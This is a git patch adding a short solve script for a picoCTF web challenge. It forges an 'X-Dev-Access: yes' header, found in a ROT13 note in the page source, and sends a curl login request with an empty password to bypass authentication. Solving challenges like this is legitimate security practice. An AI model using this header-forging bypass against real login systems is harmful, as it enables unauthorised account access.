From 8e8936404cef6cad3d3091a278d20df82e1216c9 Mon Sep 17 00:00:00 2001 From: h7x4 Date: Fri, 3 Jul 2026 14:42:01 +0900 Subject: [PATCH] web/crack_the_gate_1 --- web/crack_the_gate_1/solve.sh | 9 +++++++++ 1 file changed, 9 insertions(+) create mode 100755 web/crack_the_gate_1/solve.sh diff --git a/web/crack_the_gate_1/solve.sh b/web/crack_the_gate_1/solve.sh new file mode 100755 index 0000000..73e7b06 --- /dev/null +++ b/web/crack_the_gate_1/solve.sh @@ -0,0 +1,9 @@ +#!/usr/bin/env bash + +# ROT13 encoded note in html: NOTE: Jack - temporary bypass: use header "X-Dev-Access: yes" + +curl \ + -X POST \ + -H "X-Dev-Access: yes" \ + --json '{"email":"ctf-player@picoctf.org","password":""}' \ + "http://amiable-citadel.picoctf.net:51025/login"